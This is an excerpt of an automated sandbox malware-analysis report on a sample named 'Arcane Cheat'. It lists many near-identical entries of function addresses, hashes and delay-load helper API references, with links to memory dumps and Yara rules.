                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 06307238a98fdd7388e7513c04edefa815723a5c2070d74ce47db892c73b165d
                                  • Instruction ID: 819c5e1dbcd649b15d004635132d18b416c660c2503ca0f24b431b9f8c0b18d8
                                  • Opcode Fuzzy Hash: 06307238a98fdd7388e7513c04edefa815723a5c2070d74ce47db892c73b165d
                                  • Instruction Fuzzy Hash: 38B012E526C2016C3109B25C7C46D36025CF4C1B11730842ABE09D01C0E9407C0C0572
                                  Function 0083D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 5e652cc6604971e4c0b00a90d736af856a72d2f420cb2060a161a3e7196adb75
                                  • Instruction ID: 53a2e2973f35ff43f1891147488787d2004d5b1d0901102e67903a17547115f8
                                  • Opcode Fuzzy Hash: 5e652cc6604971e4c0b00a90d736af856a72d2f420cb2060a161a3e7196adb75
                                  • Instruction Fuzzy Hash: 53B012F526C2016C710DB24C7D86D36029CF4C0B11B30442AB509D01C0E8407C0D0572
                                  Function 0083DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 19a25bb35fae20643b5e5f34a8c3c9d991a01da4f4bb199cc9bc0f87a6fc3b69
                                  • Instruction ID: 226153cbfd40ea88f6f3434045541b3b7396d576f6b72cf09c067db2802f80db
                                  • Opcode Fuzzy Hash: 19a25bb35fae20643b5e5f34a8c3c9d991a01da4f4bb199cc9bc0f87a6fc3b69
                                  • Instruction Fuzzy Hash: 51B012F12AC201AC310872497D02D3A035CF0C0B15730C11BFC09C0144D8484C0C4573
                                  Function 0083DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 808c1924252f6a7971b5c16a44a6d6ac97d148ee778d49ce83893b000c286adb
                                  • Instruction ID: c21252b4a2142f68574e68af9366bca3153e041eb8a1fda29dc9809d261d6c42
                                  • Opcode Fuzzy Hash: 808c1924252f6a7971b5c16a44a6d6ac97d148ee778d49ce83893b000c286adb
                                  • Instruction Fuzzy Hash: ACB012E126C201AC3108724D7E02E3E039DF0C4B11730851BF509D0144D8444C0D4572
                                  Function 0083DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: ebd62ac40065bdfd54b267b88cd053e631d825a83434cb1a861195cf502753dd
                                  • Instruction ID: 890f01de679e00e7ea936e2427cd17941b9cab9f56352e0943328f473a7c1e49
                                  • Opcode Fuzzy Hash: ebd62ac40065bdfd54b267b88cd053e631d825a83434cb1a861195cf502753dd
                                  • Instruction Fuzzy Hash: 7EB012E937C30A7C320821443C07C37021CF1C0B31730452AB505D0040AD404C4D5072
                                  Function 0083DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: afc16cf5708cc743efbcfbdc8a01ffd6812d611dd94d82186c9ee060c7daeea2
                                  • Instruction ID: 0170c3aabec7e504a142c115845c6c9bb75a642541eeba318f748508379be911
                                  • Opcode Fuzzy Hash: afc16cf5708cc743efbcfbdc8a01ffd6812d611dd94d82186c9ee060c7daeea2
                                  • Instruction Fuzzy Hash: C8B012E936C2056C310861583C07E36025DF0C0B31730442AB51AC1140ED404C0D4172
                                  Function 0083DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 553251e0a65cea705318652f15140cd6f632b07ea55711a044afa328b3dd5e87
                                  • Instruction ID: 812750e1e846620e26dfe556ac35dd3565c005916da0cc9902b8de05d3e9b838
                                  • Opcode Fuzzy Hash: 553251e0a65cea705318652f15140cd6f632b07ea55711a044afa328b3dd5e87
                                  • Instruction Fuzzy Hash: 80B012E936C206AC310C61483C07D37026CF1C0B31730841ABD09C2140ED404C0D4173
                                  Function 0083DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: d790fc2d2fd9ae7255621daa31de6448b8515aee727ee639dadabf225353c3e3
                                  • Instruction ID: 9650743d177f618d3184c1616cb38f4d78602a8ad28894abaccd6051bf4a3375
                                  • Opcode Fuzzy Hash: d790fc2d2fd9ae7255621daa31de6448b8515aee727ee639dadabf225353c3e3
                                  • Instruction Fuzzy Hash: FDB012E936C2066C310C61483D07D37025CF1C0B31730841AB609C5240ED404C0E4172
                                  Function 0083DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 313540fdf19b0b9ede6f63a456f81692b1b87d691014b0c6b2b1c61c00a1dd89
                                  • Instruction ID: 4767755361fca9bdfd4a5544f860c9b0760c7e7cbbbf11b98e9efd46eb011ae3
                                  • Opcode Fuzzy Hash: 313540fdf19b0b9ede6f63a456f81692b1b87d691014b0c6b2b1c61c00a1dd89
                                  • Instruction Fuzzy Hash: C1B012E12AC3056C7108B2497D42E3A039DF0C0B11730411BF409C0144D8445C0C4672
                                  Function 0083DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 9aba66af2368388e367a337684d3f07a209b07233de9cd589dac294d48216bdf
                                  • Instruction ID: 6b90ad55a7449ace0ff943278265d33ebaa455df05f777beb07e8bf1464ae2da
                                  • Opcode Fuzzy Hash: 9aba66af2368388e367a337684d3f07a209b07233de9cd589dac294d48216bdf
                                  • Instruction Fuzzy Hash: B3B012E927C305BC310C31447E07C36022DF2C4B11730461AB606E014099807C4D5172
                                  Function 0083DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 055b65355c00a5d2230204990fd5b5c2e6ce42e542bc4f0425364c5a6d665677
                                  • Instruction ID: 95a90daf84b96aedc768818c4c3625e8714a4663dcfd406221840e27a4ff2c48
                                  • Opcode Fuzzy Hash: 055b65355c00a5d2230204990fd5b5c2e6ce42e542bc4f0425364c5a6d665677
                                  • Instruction Fuzzy Hash: 77B012E927C301AC310C71487C07D36022CF1C8B11730851ABE0AD1240D9807C0D4172
                                  Function 0083DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: da33d61b027cf508265f21ad7c290d022891169b65a4d683c98730f3ab72d8f0
                                  • Instruction ID: d4916ee5e71ad22e2946b8b93fc9611d65d76b4e73bbf5af3e2e78900104ce62
                                  • Opcode Fuzzy Hash: da33d61b027cf508265f21ad7c290d022891169b65a4d683c98730f3ab72d8f0
                                  • Instruction Fuzzy Hash: 40B012E927C301AC310C71487C07D36026CF1C4F11730451BB60AD1240D9807C0D4172
                                  Function 0083D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 232bf8ae23a0afeb637002fa979200df6d4ccc036de22c7c4379ea47d527ad13
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: 232bf8ae23a0afeb637002fa979200df6d4ccc036de22c7c4379ea47d527ad13
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 166a748769e8f02c2199984f50111e750c1d53fc7bce6a4f2bc11be1c9bd7b04
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: 166a748769e8f02c2199984f50111e750c1d53fc7bce6a4f2bc11be1c9bd7b04
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: a1296cf758efe535fdb8912cad2035b0f3a504c1fb903246506405b22b17b082
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: a1296cf758efe535fdb8912cad2035b0f3a504c1fb903246506405b22b17b082
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: efde9e6c5f437fbe3b025987adce03b962e740e37460ff3f4855085e739411d3
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: efde9e6c5f437fbe3b025987adce03b962e740e37460ff3f4855085e739411d3
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
